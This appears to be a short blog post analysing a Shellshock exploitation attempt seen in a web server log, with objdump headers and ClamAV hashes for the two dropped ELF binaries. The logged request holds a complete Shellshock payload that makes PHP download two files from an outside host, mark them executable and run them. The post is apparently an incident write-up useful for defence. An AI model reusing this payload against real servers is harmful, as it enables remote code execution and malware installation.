188.138.40.254 - - [18/Apr/2015:05:37:08 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 523 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"The two different files are used to determine which architecture the server has
susu1: file format elf64-x86-64and
susu1
architecture: i386:x86-64, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x0000000000103cc0
Program Header:
LOAD off 0x0000000000000000 vaddr 0x0000000000100000 paddr 0x0000000000100000 align 2**20
filesz 0x0000000000004494 memsz 0x0000000000004494 flags r-x
LOAD off 0x0000000000009be0 vaddr 0x0000000000509be0 paddr 0x0000000000509be0 align 2**20
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
SYMBOL TABLE:
no symbols
susu2: file format elf32-i386
susu2
architecture: i386, flags 0x00000102:
EXEC_P, D_PAGED
start address 0x00c03e50
Program Header:
LOAD off 0x00000000 vaddr 0x00c01000 paddr 0x00c01000 align 2**12
filesz 0x00003631 memsz 0x00003631 flags r-x
LOAD off 0x00000d30 vaddr 0x0804fd30 paddr 0x0804fd30 align 2**12
filesz 0x00000000 memsz 0x00000000 flags rw-
Sections:
Idx Name Size VMA LMA File off Algn
SYMBOL TABLE:
no symbols
Clamav hashes (md5 and sha256)
- 5bc85adb6368be6a5321238377802ffd:18248:susu1
- 381ea0197f00afe0d8e26bb48b71254b:14492:susu2
- 5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af:14492:susu2
- 3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016:18248:susu1
Keine Kommentare:
Kommentar veröffentlichen